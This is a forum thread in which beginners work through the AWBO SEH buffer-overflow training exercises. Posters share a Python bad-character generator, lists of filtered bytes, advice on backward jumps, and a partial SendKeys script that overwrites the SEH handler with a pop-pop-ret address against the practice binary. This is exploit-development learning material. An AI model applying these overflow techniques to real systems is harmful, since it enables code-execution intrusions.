
Thread: AWBO Buffer Overflow Exercise

  1. #1

    Hello,
    I'm pretty new to developing exploits and I'm trying the awbo exercises, which can be found at snort.org/vrt/tools/awbo.html ... I've successfully triggered the vulnerability (on the first exercise), which is an SEH overflow...

    At my current level of knowledge I'm stuck on 3 points:

    1 - The payload I need to jump to is before the SEH overflow.
    2 - The opcodes for a JUMP SHORT do not work (bad chars, I believe...). Another problem is that I need to jump more than 128 bytes backwards, so a SHORT jump won't work.
    3 - The opcodes required to decode the payload seem to be blocked (x86/alpha_upper); I've also tested x86/alpha_mixed...

    Is there any tool which generates a list of opcodes that I may insert as a payload and analyse which are the bad chars?
    What about the other issues I've mentioned?

    Any help is appreciated! Thank you.

  2. #2

    Hmmm, I'm pretty new to exploit development also. How about generating a string with the entire ascii set (omitting the null character of course). Send that in the buffer and check it out through the debugger. See what gets filtered and exclude those characters as bad. I guess you might need to run it through several times to get all the badchars.

    That's the advice given in the shellcoder's handbook in any case, and it seemed to work for me.

    I'd also appreciate any recommendations on a better way. Oh, thanks for the tip on the awbo exercises as well; I hadn't seen those before so extra practice ahead!

    As for the tool to find opcodes: msfpescan maybe?

    I'm very new to jumps so haven't had much experience there sorry. Is there such a thing as a LONG jump though or can you use two SHORT jumps?

    Cheers

  3. #3

    Thanks for the help F1gureF0ur!
    I've made this script in order to generate the string and redirected its output to a file:
    Code:
    import sys

    # Emit every byte value except 0x00 as one quoted Python string literal,
    # e.g. "\x01\x02...\xff", so it can be pasted straight into the exploit.
    sys.stdout.write("\"")
    for i in range(1, 256):
        sys.stdout.write("\\x%02x" % i)
    print("\"")
    Then I put that in my exploit and kept running it with blocks of the string, jotting the bad chars down (the ones that didn't appear in memory where they should have, or got replaced with something else). I found some that got replaced with another string; I don't really know whether it's a particularity of that exercise or not...

    Code:
    \x61 -> \x85
    
    \x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f -> \x3f
    
    \xa2 -> \x9b
    \xa3 -> \x9c
    \xa7 -> \x15
    \xa9 -> \x22
    \xaa -> \xa6
    \xac -> \xaa
    \xb0 -> \xf8
    \xb2 -> \xfd
    \xb3 -> \x33
    \xb8 -> \x27
    \xb9 -> \x31
    \xba -> \xa7
    \xbb -> \x3d
    \xbc -> \x2c
    \xbd -> \x2d
    \xbe -> \x2e
    \xbf -> \x3b
    \xc0 -> \x27
    \xdc -> \x5d
    \xdd -> \x5b
    \xde -> \x7e
    \xe3\xe4 -> \x30
    \xe2 -> \x5c
    \xe7 -> \x87
    Well, I've also tried to put these chars in other positions of the array; some got replaced again, some haven't... I'm pretty confused right now...

    These are the ones that did not appear in the memory:

    Code:
    \x07\x08\x0a\x0d\x13\x14\x1b\x25\x28\x29\x2b\x5e\x5f\x60\x7b\x7d\x7e\x7f\x81\x8d\x8f\x90\x9d\xa0\xa1\xa4\xa5\xa6\xa8\xab\xad\xae\xaf\xb1\xb4\xb5\xb6\xb7\xc3\xc4\xc5\xc6\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1
    Am I doing this the right way? Let me know if you tried this exercise and what you did in order to solve the puzzle...

    Thank you again.

  4. #4 (lupin, Super Moderator)

    I used a modified version of the jump code from this page last time I did an SEH overwrite, to get to the earlier section of my buffer from the section of memory after the SEH address.

    You'll probably be able to roll your own using the details at the link above, but if you like I can post the assembly and provide the method I used to convert it to shellcode (my rubbish assembly skills necessitated some nasty hacks, but it worked).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5

    That's a nice little article. Thanks lupin

    I also found a couple of the videos (webcasts) in the Offensive Security website resources section helpful with SEH overflows. The Apple QuickTime vid is good, as is the Surgemail overview.

    If anyone can point to any other good resources I'd be grateful!

  6. #6 (lupin, Super Moderator)

    In reply to F1gureF0ur (post #5):
    Yes, the QuickTime Offensive Security video is a good one.

    There's some more good stuff here, and here, and the securityforest site that my previous link was from has some other good references.

  7. #7

    Thank you for the replies!
    I've also found Offensive Security's webcast very didactic, a pretty good resource. Thank you lupin for the links provided; I'll study that and post the results of my tests as soon as possible.
    There's still the bad chars issue, but one step at a time. As soon as I can get EIP pointing to my buffer, I'll focus on that problem. =)
    (or... perhaps I should solve the bad chars issue before?)

  8. #8 (lupin, Super Moderator)

    In reply to trojanrs (post #7):
    Get control of CPU execution first, then look at bad characters. If bad characters are going to be an issue, it will most likely become apparent when you start to insert your shellcode, and you can deal with it then. The bad character topic also came up here, so have a look at that too.

  9. #9

    Thank you so much for that lupin. I've been struggling with my first SEH overwrite today and that series of blog articles looks like it will be the extra bit of 'hand-holding' I'll need.

    Cheers!

  10. #10

    lupin, the jump backwards assembly code worked! I hardcoded it into immunity dbg though, since I think my string input method is a piece of...

    This is the code I'm using to send the string:

    Code:
    import win32com.client

    # Drive the target's keyboard input through WScript.Shell (SendKeys)
    shell = win32com.client.Dispatch("WScript.Shell")
    shell.AppActivate('awbo2.exe')

    # 1076 bytes of filler, 4 bytes of placeholder where the short jump will go,
    # then the address of the pop pop ret used as the overwritten SEH handler
    shell.SendKeys(('A' * 1076) + "\x42\x42\x42\x42\x6b\x10\x40\x00")
    shell.SendKeys('{ENTER}')
    It will jump to a pop pop ret and return execution to "\x42\x42\x42\x42", where a jump short should take place...

    I think the bad chars problem is originating from the method I'm currently using. Is there a better way to send the string to the program when it's opened with immdbg?
